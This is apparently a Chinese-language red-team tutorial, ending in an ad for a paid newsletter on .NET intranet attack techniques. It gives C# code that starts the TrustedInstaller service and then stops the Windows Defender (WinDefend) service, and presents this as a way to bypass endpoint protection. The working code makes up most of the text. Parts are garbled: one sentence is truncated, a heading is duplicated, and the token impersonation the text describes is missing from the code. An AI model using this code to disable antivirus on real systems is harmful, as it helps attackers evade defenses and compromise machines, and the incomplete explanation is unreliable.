01基本介绍
02编码实现
原理上通过Windows API函数将当前进程的权限提升至TrustedInstaller,从而实现了对Windows Defender服务的控制。通常可以利用Windows API中的OpenSCManager、OpenProcessToken、ImpersonateLoggedOnUser以及ControlService等函数协同工作,来实现对Windows Defender服务的关闭操作。
3.1 启动TrustedInstaller
ZwQueryInformationProcess函数用于获取指定进程的信息,如进程ID、父进程信息等,ReadProcessMemory函数用于从指
通过调用OpenSCManager、OpenService、StartService这三个API方法启动一个TrustedInstaller 服务。调用函数代码如下所示。
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, EntryPoint = "OpenSCManagerW", ExactSpelling = true, SetLastError = true)]
public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess);
OpenService函数用于打开服务控制管理器(SCM)数据库中指定的服务,方便进行下一步的操作(如启动、停止等),具体代码如下所示。
[DllImport("advapi32", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors);
StartService函数是Windows Service Control Manager (SCM) API的一部分,用于启动一个已安装的服务。为了便于使用,我们封装成一个自定义方法start_trustedinstaller_service,具体代码如下所示。
public static void start_trustedinstaller_service()
{
IntPtr intPtr = Program.OpenSCManager(null, null, 0xF003F);
bool flag = intPtr == IntPtr.Zero;
if (flag)
{
Console.WriteLine("OpenSCManager failed!");
}
else
{
Console.WriteLine("OpenSCManager success!");
string lpServiceName = "TrustedInstaller";
IntPtr intPtr2 = Program.OpenService(intPtr, lpServiceName, (uint) SERVICE_ACCESS.SERVICE_START);
bool flag2 = Program.StartService(intPtr2, 0, null);
bool flag3 = flag2;
if (flag3)
{
Console.WriteLine("TrustedInstaller service started!");
}
else
{
Console.WriteLine("TrustedInstaller service cannot be started!");
}
Thread.Sleep(2000);
Program.CloseHandle(intPtr2);
Program.CloseHandle(intPtr);
}
}
上述代码中,依次调用系统API函数OpenSCManager,用于打开服务控制管理器数据库,并返回一个句柄。参数 null 表示连接到本地计算机,0xF003F 是访问权限标志,表示具有完全访问权限。
接着,声明一个值为TrustedInstaller的变量ServiceName,使用 OpenService 函数打开 TrustedInstaller 服务,并返回一个服务句柄。SERVICE_ACCESS.SERVICE_START 权限表示具有启动服务的权限。
最后,调用API 函数 StartService 启动 TrustedInstaller 服务。
3.2 启动TrustedInstaller
通过调用OpenService、ControlService等API函数来关闭Windows Defender。调用函数代码如下所示。
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ControlService(IntPtr hService, Program.SERVICE_CONTROL dwControl, ref Program.SERVICE_STATUS lpServiceStatus);
ControlService函数,用于控制Windows服务的,包括启动、停止、暂停等。最后,我们封装成一个自定义方法stop_defender_service,实现的过程利用ControlService函数打开Windows Defender服务,将服务的句柄权限标志设置成SERVICE_STOP即可,具体实现代码如下所示。
public static void stop_defender_service()
{
IntPtr intPtr = Program.OpenSCManager(null, null, 983103U);
bool flag = intPtr == IntPtr.Zero;
if (flag)
{
Console.WriteLine("OpenSCManager failed!");
}
else
{
Console.WriteLine("OpenSCManager success!");
string lpServiceName = "WinDefend";
IntPtr intPtr2 = Program.OpenService(intPtr, lpServiceName, 44U);
Program.SERVICE_STATUS service_STATUS = default(Program.SERVICE_STATUS);
bool flag2 = Program.ControlService(intPtr2, Program.SERVICE_CONTROL.STOP, ref service_STATUS);
bool flag3 = flag2;
if (flag3)
{
Console.WriteLine("Windefender service stopped!");
}
else
{
Console.WriteLine("Windefender service cannot be stopped!");
}
Thread.Sleep(2000);
Program.CloseHandle(intPtr2);
Program.CloseHandle(intPtr);
}
}
综上,通过一系列步骤成功模拟 TrustedInstaller 服务的令牌,从而停止 Windows Defender反病毒软件服务,也因此该方法在内网红队绕过Windows终端安全防护阶段具有重要的意义。想要了解完整或者更多的内网安全防御绕过方向的文章,参考小报童《.NET 内网实战攻防》电子报刊。
03.NET 电子报刊
本次电子报刊《.NET 内网安全攻防》专栏,内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,可细分为以下8个方向。
1) .NET 安全防御绕过
2) .NET 本地权限提升
3) .NET 内网信息收集
4) .NET 内网代理通道
5) .NET 内网横向移动
6) .NET 目标权限维持
7) .NET 数据传输外发
8) .NET 目标痕迹清理
